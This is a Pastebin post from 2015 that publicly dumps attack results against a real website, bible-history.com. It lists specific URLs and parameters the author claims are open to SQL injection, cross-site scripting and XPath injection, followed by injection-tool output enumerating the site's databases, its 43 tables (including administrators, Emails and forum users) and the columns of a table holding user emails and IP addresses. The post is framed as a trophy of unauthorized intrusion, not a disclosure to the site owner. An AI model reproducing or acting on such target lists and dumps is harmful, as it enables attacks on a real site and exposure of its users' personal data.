9r3nXPaRTa

Full SQLi + XSS www.bible-history.com By GrenXPaRTa

Feb 4th, 2015
552
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
MySQL 4.10 KB | None | 0 0
  1. Taret   : http://www.bible-history.com/
  2.  
  3. Vulnerability Types:-
  4.                       (Sqli)
  5. http://www.bible-history.com/subcat.php?id=16
  6. http://www.bible-history.com/subcat.php?id=99999999
  7. http://www.bible-history.com/subcat.php?id=
  8. http://www.bible-history.com/isbe/^search_term=1
  9. http://www.bible-history.com/isbe/^search_term=
  10. http://www.bible-history.com/kjv/
  11. http://www.bible-history.com/faussets/
  12. http://www.bible-history.com/links.php?sub=41&cat_name=Ancient+Documents&subcat_name=Bible&cat=16
  13. http://www.bible-history.com/links.php?sub=41&cat_name=Ancient+Documents&subcat_name=Bible&cat=99999999
  14. http://www.bible-history.com/links.php?sub=41&cat_name=Ancient+Documents&subcat_name=Bible&cat=
  15. http://www.bible-history.com/links.php?cat_name=Ancient+Documents&subcat_name=Ancient+History&cat=16&sub=44
  16. http://www.bible-history.com/links.php?cat_name=Ancient+Documents&subcat_name=Ancient+History&cat=16&sub=99999999
  17. http://www.bible-history.com/links.php?cat_name=Ancient+Documents&subcat_name=Ancient+History&cat=16&sub=
  18.                        (XSS)
  19. http://www.bible-history.com/subcat.php?id=16
  20. http://www.bible-history.com/hitchcock/
  21. http://www.bible-history.com/eastons/
  22. http://www.bible-history.com/smiths/
  23. http://www.bible-history.com/naves/
  24. http://www.bible-history.com/isbe/
  25. http://www.bible-history.com/kjv/
  26. http://www.bible-history.com/faussets/
  27. http://www.bible-history.com/studybible/
  28. http://www.bible-history.com/links.php?cat=16&sub=104&cat_name=Ancient+Documents&subcat_name=Josephus
  29. http://www.bible-history.com/links.php?cat=16&sub=107&cat_name=Ancient+Documents&subcat_name=Greco-Roman
  30. http://www.bible-history.com/links.php?cat=16&sub=241&cat_name=Ancient+Documents&subcat_name=Papyrology
  31. http://www.bible-history.com/links.php?cat=16&sub=108&cat_name=Ancient+Documents&subcat_name=Collections
  32.                         (XPath Injection)
  33. http://www.bible-history.com/hitchcock/
  34. http://www.bible-history.com/eastons/
  35. http://www.bible-history.com/smiths/
  36. http://www.bible-history.com/naves/
  37. http://www.bible-history.com/isbe/
  38. http://www.bible-history.com/kjv/
  39. http://www.bible-history.com/faussets/
  40. http://www.bible-history.com/studybible/
  41.  
  42. Database:-
  43. available databases [5]:
  44. [*] bible_glossary
  45. [*] bible_history
  46. [*] information_schema
  47. [*] keywords
  48. [*] kidsdict
  49.  
  50. Database: bible_history
  51. [43 tables]
  52. +--------------------+
  53. | Emails             |
  54. | administrators     |
  55. | bho_board_bans     |
  56. | bho_board_forums   |
  57. | bho_board_posts    |
  58. | bho_board_search   |
  59. | bho_board_topics   |
  60. | bho_board_users    |
  61. | bible_book         |
  62. | books              |
  63. | cat                |
  64. | categories         |
  65. | chapters           |
  66. | chapters1          |
  67. | eastons            |
  68. | guestbook          |
  69. | isbe               |
  70. | kingjames          |
  71. | kjv_verse          |
  72. | links              |
  73. | mathew             |
  74. | naves              |
  75. | questions          |
  76. | series             |
  77. | smiths             |
  78. | smiths_ref         |
  79. | sub                |
  80. | subjects           |
  81. | tbl_dictionary     |
  82. | tbl_fausset        |
  83. | tbl_gfd            |
  84. | tbl_hitchcock      |
  85. | tbl_hollman        |
  86. | tbl_ibhcategory    |
  87. | tbl_ibhsubcategory |
  88. | tbl_image          |
  89. | tbl_isbe           |
  90. | tbl_sdas           |
  91. | tbl_the            |
  92. | tbl_tt             |
  93. | tbl_vcx            |
  94. | user_links         |
  95. | web_verse          |
  96. +--------------------+
  97.  
  98. Database: bible_history
  99. Table: user_links
  100. [12 columns]
  101. +-------------------------+-------------+
  102. | Column                  | Type        |
  103. +-------------------------+-------------+
  104. | catid                   | int(11)     |
  105. | sid                     | int(11)     |
  106. | user_link_approval_code | varchar(32) |
  107. | user_link_creation_date | date        |
  108. | user_link_ip_address    | varchar(20) |
  109. | user_links_description  | text        |
  110. | user_links_email        | varchar(50) |
  111. | user_links_is_real      | char(1)     |
  112. | user_links_note         | text        |
  113. | user_links_onlinestatus | char(1)     |
  114. | user_links_title        | text        |
  115. | user_links_url          | text        |
  116. +-------------------------+-------------+
Add Comment
Please, Sign In to add comment